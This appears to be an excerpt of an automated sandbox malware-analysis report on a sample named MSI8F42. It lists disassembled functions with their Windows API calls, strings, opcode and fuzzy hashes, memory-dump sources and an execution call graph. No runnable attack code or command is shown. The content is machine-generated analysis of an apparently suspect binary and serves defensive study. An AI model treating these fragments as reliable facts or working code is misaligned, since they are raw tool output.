                                                                                                                                            • Opcode Fuzzy Hash: 2026a7790c26308e47ea4276267e2af4c61ebb9f8f3b78d8fea42bfb706584f0
                                                                                                                                            • Instruction Fuzzy Hash: 5D51C2B1D007489FDB11DFA4C941BEEF7B8FF09300F14426AE905AB281E774AA95CB91
                                                                                                                                            Function 002F70A0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 149COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: \\?\$\\?\UNC\
                                                                                                                                            • API String ID: 0-3019864461
                                                                                                                                            • Opcode ID: f4abdb02af1738c431e8bee76b3425b39d83e28bd61a9c34749c744e0607304a
                                                                                                                                            • Instruction ID: d21e9ba9f53e555bc82bcd1ea19e8975fb2f34ff9c54861319aafe67f87d627a
                                                                                                                                            • Opcode Fuzzy Hash: f4abdb02af1738c431e8bee76b3425b39d83e28bd61a9c34749c744e0607304a
                                                                                                                                            • Instruction Fuzzy Hash: EB510370A24209DBDB15CF64C845BFEF7B9FF58384F10452DE901AB280DBB56998CB90
                                                                                                                                            Function 00316059 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 0031607E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: EncodePointer
                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                            • API String ID: 2118026453-2084237596
                                                                                                                                            • Opcode ID: bacfe561ccb3ad79691d37ca3ee0ee2a08cc0f404c2a95d5bf9047f0218c8556
                                                                                                                                            • Instruction ID: 3bf2d920ba06dc66712ab43c96afa69f9da5d4b10d275a02468b97f50418f65d
                                                                                                                                            • Opcode Fuzzy Hash: bacfe561ccb3ad79691d37ca3ee0ee2a08cc0f404c2a95d5bf9047f0218c8556
                                                                                                                                            • Instruction Fuzzy Hash: E4413A71900209EFCF1ADF98CC82AEEBBB5BF4C304F1541A9F90467252D3759A91DB50
                                                                                                                                            Function 0030DF8F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: H_prolog3___cftoe
                                                                                                                                            • String ID: !%x
                                                                                                                                            • API String ID: 855520168-1893981228
                                                                                                                                            • Opcode ID: bdb4d172f4f64a842ca575c33680dcbead7c5f16cf4480f603e7fb4ea9b43b53
                                                                                                                                            • Instruction ID: 1fe96bbc331cdb64975a0f0b2573597ab78fb73b15e434b83eb9845607a7ead2
                                                                                                                                            • Opcode Fuzzy Hash: bdb4d172f4f64a842ca575c33680dcbead7c5f16cf4480f603e7fb4ea9b43b53
                                                                                                                                            • Instruction Fuzzy Hash: 5E318B71D1120DEBDF05DF94E991AEEB7B5FF08304F104819F504AB281D775AA55CB60
                                                                                                                                            Function 003119FA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: H_prolog3___cftoe
                                                                                                                                            • String ID: !%x
                                                                                                                                            • API String ID: 855520168-1893981228
                                                                                                                                            • Opcode ID: e5c8fb77be072f22461b98c4297cae169e29337d4d604028fccc74d79c43b819
                                                                                                                                            • Instruction ID: 903a5d35ebbaddd12ab019b7cad308a8a355949c14bf168ea64fa169de0d0262
                                                                                                                                            • Opcode Fuzzy Hash: e5c8fb77be072f22461b98c4297cae169e29337d4d604028fccc74d79c43b819
                                                                                                                                            • Instruction Fuzzy Hash: E1318E31D1525DAFDF06DF94E881AEEBBB9EF09300F140019F944A7242D7759A85CFA0
                                                                                                                                            Function 002F5F40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • ConvertSidToStringSidW.ADVAPI32(?,00000000), ref: 002F5F86
                                                                                                                                            • LocalFree.KERNEL32(00000000,Invalid SID,0000000B,?,00000000,7642E7B1), ref: 002F5FF6
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ConvertFreeLocalString
                                                                                                                                            • String ID: Invalid SID
                                                                                                                                            • API String ID: 3201929900-130637731
                                                                                                                                            • Opcode ID: 3bd76c1b4f76d2bc9b1d7958b6d0ac572959626d6dc8edd0ff51768f98ef5c67
                                                                                                                                            • Instruction ID: 924093284c0af9a0709b0e66c886d41ea255376f06c751093d3acefeca964672
                                                                                                                                            • Opcode Fuzzy Hash: 3bd76c1b4f76d2bc9b1d7958b6d0ac572959626d6dc8edd0ff51768f98ef5c67
                                                                                                                                            • Instruction Fuzzy Hash: C421AEB4A14609DBDB15CF58C855BBFBBF8FF44714F100A1DE501AB680D7BA6A048BD0
                                                                                                                                            Function 002F9070 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 002F909B
                                                                                                                                            • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 002F90FE
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                                                            • String ID: bad locale name
                                                                                                                                            • API String ID: 3988782225-1405518554
                                                                                                                                            • Opcode ID: d692e5745d1b16d491662b284fa02b44b9c8255e95f394634c059ce97469700d
                                                                                                                                            • Instruction ID: e0cc3850785b12d50f2222073f68e4344777f02e11a6c53f50ca78827739d9da
                                                                                                                                            • Opcode Fuzzy Hash: d692e5745d1b16d491662b284fa02b44b9c8255e95f394634c059ce97469700d
                                                                                                                                            • Instruction Fuzzy Hash: C921C070805B84DED722CFA8C90478BBFF4EF19710F14869EE4999B781D3B5A604CBA1
                                                                                                                                            Function 002FF098 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: H_prolog3_
                                                                                                                                            • String ID: false$true
                                                                                                                                            • API String ID: 2427045233-2658103896
                                                                                                                                            • Opcode ID: 434f537a23c1fb34bd53915acaff2bad26ef78639ca81f70cd63afe07f5e7172
                                                                                                                                            • Instruction ID: b1646d23916e074e711bd6bc5de5e0f9bb23e96518d1663bc6059656f73e4524
                                                                                                                                            • Opcode Fuzzy Hash: 434f537a23c1fb34bd53915acaff2bad26ef78639ca81f70cd63afe07f5e7172
                                                                                                                                            • Instruction Fuzzy Hash: 1511D075901749AFC722EFB4D841B9AB7F4AF09300F10C92AE5968B282EB30E505CB90
                                                                                                                                            Function 00300D24 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00300D30
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00300D8B
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 593203224-1316489359
                                                                                                                                            • Opcode ID: 68c04522aa3e7ba2be674f42bfc1a1a0b72759a7a9655519d5133d464bfd35af
                                                                                                                                            • Instruction ID: 34b0180d9f29b69513e7a2123ac5c4e54c8c77e002d6b0b4100b8a7f06834641
                                                                                                                                            • Opcode Fuzzy Hash: 68c04522aa3e7ba2be674f42bfc1a1a0b72759a7a9655519d5133d464bfd35af
                                                                                                                                            • Instruction Fuzzy Hash: 1B019E35600608AFCB1ADF54C8A1A9E7BB9EF84350F150099E8059F3A1EB70FE40CBA0
                                                                                                                                            Function 0032776F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?), ref: 003277AF
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CountCriticalInitializeSectionSpin
                                                                                                                                            • String ID: 21$InitializeCriticalSectionEx
                                                                                                                                            • API String ID: 2593887523-1156534138
                                                                                                                                            • Opcode ID: fd92e301c391a9374325cf79c8c9b233a570b83353d68122ca9e514d47877359
                                                                                                                                            • Instruction ID: d94140da3ac511e112504168ed5a2cb626f508498169f47690c1859a94141bde
                                                                                                                                            • Opcode Fuzzy Hash: fd92e301c391a9374325cf79c8c9b233a570b83353d68122ca9e514d47877359
                                                                                                                                            • Instruction Fuzzy Hash: 3AE01236584228FBCB231F65EC89EDE7F29FB45761F004411FE1965160DBB28921DAD0
                                                                                                                                            Function 00327559 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22memoryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Alloc
                                                                                                                                            • String ID: 21$FlsAlloc
                                                                                                                                            • API String ID: 2773662609-4108990562
                                                                                                                                            • Opcode ID: 46ce57caae1c74b42c0e24ac84c0eddfd8990bda1a4813e49d667f39c6fd8d47
                                                                                                                                            • Instruction ID: 7c5b4f2319f8745054f98beeb5b572ac4bea6407104a11d222710f4d19bd0bdd
                                                                                                                                            • Opcode Fuzzy Hash: 46ce57caae1c74b42c0e24ac84c0eddfd8990bda1a4813e49d667f39c6fd8d47
                                                                                                                                            • Instruction Fuzzy Hash: 08E0C23268833CF7C7232B61BC46DDEF908AF44B60F040021FE045A2909BA2888192D1
                                                                                                                                            Function 00327915 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • FreeLibrary.KERNEL32(0034E428), ref: 00327932
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FreeLibrary
                                                                                                                                            • String ID: (4$x4
                                                                                                                                            • API String ID: 3664257935-1919804628
                                                                                                                                            • Opcode ID: f62c333874ebdd3c7b80716b6e3cb93f24a002fab18049c6c6e785fce8c7b44d
                                                                                                                                            • Instruction ID: 5ee68e1cce922ef7d9afebb8d9571e58aab5c747b6a81bfc162ead40418f91a0
                                                                                                                                            • Opcode Fuzzy Hash: f62c333874ebdd3c7b80716b6e3cb93f24a002fab18049c6c6e785fce8c7b44d
                                                                                                                                            • Instruction Fuzzy Hash: CAE08C36C083259BEB331F09E804BA077D8BB60332F26022AD8EC162A093B12CD1C6D0
                                                                                                                                            Function 002F4070 Relevance: 5.2, APIs: 4, Instructions: 189memoryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • LocalFree.KERNEL32(00000000,002F4261,00334400,000000FF,7642E7B1,00000000,?,00000000,?,?,?,00334400,000000FF,?,002F3A75,?), ref: 002F4096
                                                                                                                                            • LocalAlloc.KERNEL32(00000040,40000022,7642E7B1,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 002F4154
                                                                                                                                            • LocalAlloc.KERNEL32(00000040,3FFFFFFF,7642E7B1,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 002F4177
                                                                                                                                            • LocalFree.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 002F4217
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Local$AllocFree
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2012307162-0
                                                                                                                                            • Opcode ID: adcce28dc6e073b97ba1403116772deb4f86ed4330362d8051ae9ae2130c0469
                                                                                                                                            • Instruction ID: d5aef409fcb8ecb27f06727063097af41d29f2ca6b41e6e6452ff1010bbd2a21
                                                                                                                                            • Opcode Fuzzy Hash: adcce28dc6e073b97ba1403116772deb4f86ed4330362d8051ae9ae2130c0469
                                                                                                                                            • Instruction Fuzzy Hash: AF5190B1A1020A9FDB18DF68C985ABEFBB5EB48340F14463DE925E7380D770A950CB50
                                                                                                                                            Function 002F1D80 Relevance: 5.2, APIs: 4, Instructions: 171memoryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • LocalAlloc.KERNEL32(00000040,80000022,00000000,?,00000000), ref: 002F1E01
                                                                                                                                            • LocalAlloc.KERNEL32(00000040,7FFFFFFF,00000000,?,00000000), ref: 002F1E21
                                                                                                                                            • LocalFree.KERNEL32(7FFFFFFE,?,00000000), ref: 002F1EA7
                                                                                                                                            • LocalFree.KERNEL32(00000001,7642E7B1,00000000,00000000,00333C40,000000FF,?,00000000), ref: 002F1F2D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Local$AllocFree
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2012307162-0
                                                                                                                                            • Opcode ID: 8eb57f5299ba9c46accee158cc4b0c6785a07e3209a355df4041523321e0d35e
                                                                                                                                            • Instruction ID: b37eea8ca28756f7ab5e3e9366bed8e0718c6c574dddc529e9a0527b11a482b8
                                                                                                                                            • Opcode Fuzzy Hash: 8eb57f5299ba9c46accee158cc4b0c6785a07e3209a355df4041523321e0d35e
                                                                                                                                            • Instruction Fuzzy Hash: 2E51F372A14219DFC716DF28DC80A6AF7E8FB49390F510A3EF916D7290DB30D9248B91

                                                                                                                                            Execution Graph

                                                                                                                                            Execution Coverage:0.3%
                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                            Signature Coverage:5.2%
                                                                                                                                            Total number of Nodes:582
                                                                                                                                            Total number of Limit Nodes:2
                                                                                                                                            execution_graph 8814 1800013f0 8817 1800d65bc 8814->8817 8818 1800d65d7 8817->8818 8819 1800d661d GetLastError 8818->8819 8822 180001400 8818->8822 8820 1800d6635 8819->8820 8819->8822 8821 1800d663f OutputDebugStringW 8820->8821 8820->8822 8821->8822 9405 1800036f0 9406 180003ba2 9405->9406 9407 1800036f9 9405->9407 9408 1800d5000 _invalid_parameter_noinfo_noreturn 7 API calls 9407->9408 9408->9406 8921 18009bac0 8953 180099c70 InitializeCriticalSection InitializeCriticalSection InitializeCriticalSection InitializeCriticalSection 8921->8953 8926 1800d505c std::_Facet_Register 51 API calls 8927 18009bcb1 InitializeCriticalSection 8926->8927 8928 18009bd1b 8927->8928 8929 18009be3c 8928->8929 8930 18009bd2b 8928->8930 8986 180014890 8929->8986 8932 1800d505c std::_Facet_Register 51 API calls 8930->8932 8933 18009bd52 InitializeCriticalSection 8932->8933 8935 1800d505c std::_Facet_Register 51 API calls 8933->8935 8937 18009be1c 8935->8937 8938 18009be5e 8994 18003e840 8938->8994 8940 18009be96 8941 18009bea3 DeleteCriticalSection 8940->8941 9018 180098f20 8941->9018 8943 18009beba 9023 1800b0f20 8943->9023 8954 180099d27 8953->8954 8955 1800d505c std::_Facet_Register 51 API calls 8954->8955 8956 180099d65 8955->8956 8957 1800d505c std::_Facet_Register 51 API calls 8956->8957 8958 180099d92 8957->8958 9027 180098fd0 8958->9027 8962 180098fd0 InitializeCriticalSection 8964 180099efa 8962->8964 9036 1800b1200 8964->9036 8968 180099fee 8974 1800d505c std::_Facet_Register 51 API calls 8968->8974 8969 18009a178 8970 180014890 49 API calls 8969->8970 8971 18009a188 8970->8971 8972 1800d7ba8 Concurrency::cancel_current_task 2 API calls 8971->8972 8973 18009a198 8972->8973 8975 18009a08a 8974->8975 8976 1800d505c std::_Facet_Register 51 API calls 8975->8976 8977 18009a0de InitializeCriticalSection 8976->8977 8978 1800d505c std::_Facet_Register 51 API calls 8977->8978 8979 18009a133 8978->8979 8980 1800d505c 8979->8980 8985 1800d5067 8980->8985 8981 18009bb3b InitializeCriticalSection InitializeCriticalSection 8981->8926 8982 1800ed83c std::_Facet_Register 2 API calls 8982->8985 8983 1800d3764 Concurrency::cancel_current_task 2 API calls 8983->8985 8984 180011140 Concurrency::cancel_current_task 51 API calls 8984->8985 8985->8980 8985->8981 8985->8982 8985->8983 8985->8984 8987 1800d7450 __std_exception_copy 49 API calls 8986->8987 8988 1800148c8 8987->8988 8989 1800d7ba8 8988->8989 8990 1800d7bc7 8989->8990 8991 1800d7bf0 RtlPcToFileHeader 8990->8991 8992 1800d7c12 RaiseException 8990->8992 8993 1800d7c08 8991->8993 8992->8938 8993->8992 8995 18003e8c5 8994->8995 9002 18003e860 8994->9002 8995->8940 8996 18003e840 93 API calls 8996->9002 8997 18003e8d6 9290 180014880 8997->9290 8999 18003e895 DeleteCriticalSection 8999->9002 9002->8995 9002->8996 9002->8997 9002->8999 9339 180020640 9018->9339 9020 180098f37 9343 180020e00 9020->9343 9022 180098f53 9022->8943 9024 1800b0f71 9023->9024 9026 1800b0f48 9023->9026 9026->9024 9352 18003e590 9026->9352 9028 180098ffb 9027->9028 9029 18009900e InitializeCriticalSection 9027->9029 9028->9029 9030 180099026 9029->9030 9031 1800b1160 9030->9031 9032 1800d505c std::_Facet_Register 51 API calls 9031->9032 9033 1800b1189 9032->9033 9039 1800b21f0 9033->9039 9037 1800d505c std::_Facet_Register 51 API calls 9036->9037 9038 180099f04 InitializeCriticalSection CreateSemaphoreW 9037->9038 9038->8968 9038->8969 9048 18001c1b0 9039->9048 9041 1800b2247 9042 18001c1b0 51 API calls 9041->9042 9043 1800b227a 9042->9043 9044 18001c1b0 51 API calls 9043->9044 9045 1800b22a3 9044->9045 9046 18001c1b0 51 API calls 9045->9046 9047 180099e61 9046->9047 9047->8962 9049 18001c1e1 9048->9049 9056 18001c293 9048->9056 9052 18001c212 9049->9052 9053 18001c28e 9049->9053 9057 18001c1e7 9049->9057 9058 180011160 9052->9058 9077 180011140 9053->9077 9098 180014060 9056->9098 9057->9041 9059 180011169 9058->9059 9060 180011170 9058->9060 9059->9057 9061 180011179 9060->9061 9067 1800111a9 9060->9067 9062 180011182 9061->9062 9063 1800111b5 9061->9063 9064 1800d505c std::_Facet_Register 51 API calls 9062->9064 9065 180011140 Concurrency::cancel_current_task 51 API calls 9063->9065 9066 18001118d 9064->9066 9065->9066 9068 180011195 9066->9068 9107 1800dbd50 9066->9107 9069 1800d5080 9067->9069 9076 180011140 Concurrency::cancel_current_task 51 API calls 9067->9076 9112 1800ed83c 9067->9112 9115 1800d3764 9067->9115 9068->9057 9069->9057 9076->9067 9078 18001114e Concurrency::cancel_current_task 9077->9078 9079 1800d7ba8 Concurrency::cancel_current_task 2 API calls 9078->9079 9080 18001115f 9079->9080 9081 180011169 9080->9081 9082 180011179 9080->9082 9097 1800111a9 9080->9097 9081->9056 9083 180011182 9082->9083 9084 1800111b5 9082->9084 9085 1800d505c std::_Facet_Register 51 API calls 9083->9085 9086 180011140 Concurrency::cancel_current_task 51 API calls 9084->9086 9087 18001118d 9085->9087 9086->9087 9088 180011195 9087->9088 9090 1800dbd50 _invalid_parameter_noinfo_noreturn 49 API calls 9087->9090 9088->9056 9089 1800d5080 9089->9056 9092 1800111c0 9090->9092 9091 1800ed83c std::_Facet_Register 2 API calls 9091->9097 9228 1800d7450 9092->9228 9094 1800111f9 9094->9056 9095 1800d3764 Concurrency::cancel_current_task 2 API calls 9095->9097 9096 180011140 